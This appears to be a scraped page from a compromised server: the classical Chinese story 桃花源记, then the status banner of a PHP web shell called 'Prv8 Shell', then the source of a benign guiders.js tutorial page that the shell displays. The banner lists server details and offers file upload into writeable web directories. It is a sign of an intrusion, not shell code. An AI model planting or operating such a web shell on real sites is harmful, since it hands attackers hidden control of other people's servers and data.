晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/akaindir/public_html/crm/libraries/guidersjs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/akaindir/public_html/crm/libraries/guidersjs/README.html
<html>
  <head>
    <style type="text/css">
      body {
        margin: 0;
        padding: 0;
      }

      .guider_description a, .guider_description a:visited {
        color: #1054AA;
      }

      #clock {
        border: 2px solid #333;
        height: 200px;
        margin-left: 100px;
        position: relative;
        text-align: center;
        width: 300px;
      }
      
      .stopper {
        color: #777;
        font-size: 77%;
      }
    </style>
    
    <!-- guiders.js requires jQuery as a prerequisite. Be sure to load guiders.js AFTER jQuery. -->
    <script type="text/javascript" src="jquery-1.5.1.min.js"></script>
    <script type="text/javascript" src="guiders-1.2.6.js"></script>
    <link rel="stylesheet" href="guiders-1.2.6.css" type="text/css" />
  </head>
  <body>
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <div id="clock" onclick="guiders.next();">
      <br />
      <img src="clock.gif" width=150 height=150 />
    </div>
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />

    <script type="text/javascript">
    /**
     * Guiders are created with guiders.createGuider({settings}).
     *
     * You can show a guider with the .show() method immediately
     * after creating it, or with guiders.show(id) and the guider's id.
     *
     * guiders.next() will advance to the next guider, and
     * guiders.hideAll() will hide all guiders.
     *
     * By default, a button named "Next" will have guiders.next as
     * its onclick handler.  A button named "Close" will have
     * its onclick handler set to guiders.hideAll.  onclick handlers
     * can be customized too.
     */
     
    guiders.createGuider({
      buttons: [{name: "Next"}],
      description: "Guiders are a user interface design pattern for introducing features of software. This dialog box, for example, is the first in a series of guiders that together make up a guide.",
      id: "first",
      next: "second",
      overlay: true,
      title: "Welcome to Guiders.js!"
    }).show();
    /**
     * .show() means that this guider will get shown immediately after creation.
     *
     * Using .show() is one way of starting your guiders.
     * 
     * Another way is by directing the user to a special URL with the guider id in
     * its hash tag, such as:
     *
     * http://www.local.com/README.html#guider=first
     *
     * This makes it easy to only show guiders for new users.  It can also be used
     * to route people among multiple web pages and still keep showing the guiders.
     */
    
    guiders.createGuider({
      attachTo: "#clock",
      buttons: [{name: "Close"},
                {name: "Next"}],
      description: "For example, this guider is attached to the 12 o'clock direction relative to the attached element. The Guiders.js API uses a clock model to determine where the guider should be placed.<br/><br/>Attaching a guider to an element focuses user on the area of interest.",
      id: "second",
      next: "third",
      position: 12,
      title: "Guiders are typically attached to an element on the page."
    });
               
    guiders.createGuider({
      attachTo: "#clock",
      buttons: [{name: "Close, then click on the clock.", onclick: guiders.hideAll}],
      description: "Custom event handlers can be used to hide and show guiders. This allows you to interactively show the user how to use your software by having them complete steps. To try it, click on the clock.",
      id: "third",
      next: "fourth",
      position: 2,
      title: "You can advance guiders from custom event handlers.",
      width: 500
    });

    guiders.createGuider({
      attachTo: "#clock",
      buttons: [{name: "Exit Guide", onclick: guiders.hideAll},
                {name: "Continue", onclick: guiders.next}],
      buttonCustomHTML: "<input type=\"checkbox\" id=\"stop_showing\" /><label for=\"stop_showing\" class=\"stopper\">Optional checkbox. (You can add one.)</label>",
      description: "Other aspects of the guider can be customized as well, such as the button names, button onclick handlers, and dialog widths. You'd also want to modify the CSS to your own project's style.",
      id: "fourth",
      next: "fifth",
      position: 7,
      title: "Guiders can be customized.",
      width: 600
    });
    
    guiders.createGuider({
      buttons: [{name: "Next"}],
      description: "Guiders can also be used to introduce of brand new features to existing users. Here is an example of a guider in Gmail. Google's CSS calls this a promo, likely short for promotional box. <br/><br/> <img src=\"promo_gmail.png\" style=\"border: 1px solid #333;\" />",
      id: "fifth",
      next: "finally",
      overlay: true,
      title: "How else can I use guiders?",
      width: 550
    });

    guiders.createGuider({
      buttons: [{name: "Close", classString: "primary-button"}],
      description: "To get started, have a look at this HTML file, then emulate it for use in your own project. You can also see Guiders in action on our site, <a href=\"http://www.optimizely.com/guiders\">www.optimizely.com</a>",
      id: "finally",
      overlay: true,
      title: "Great, so how do I get started?",
      width: 500
    });
    </script>
  </body>
</html>

haha - 2025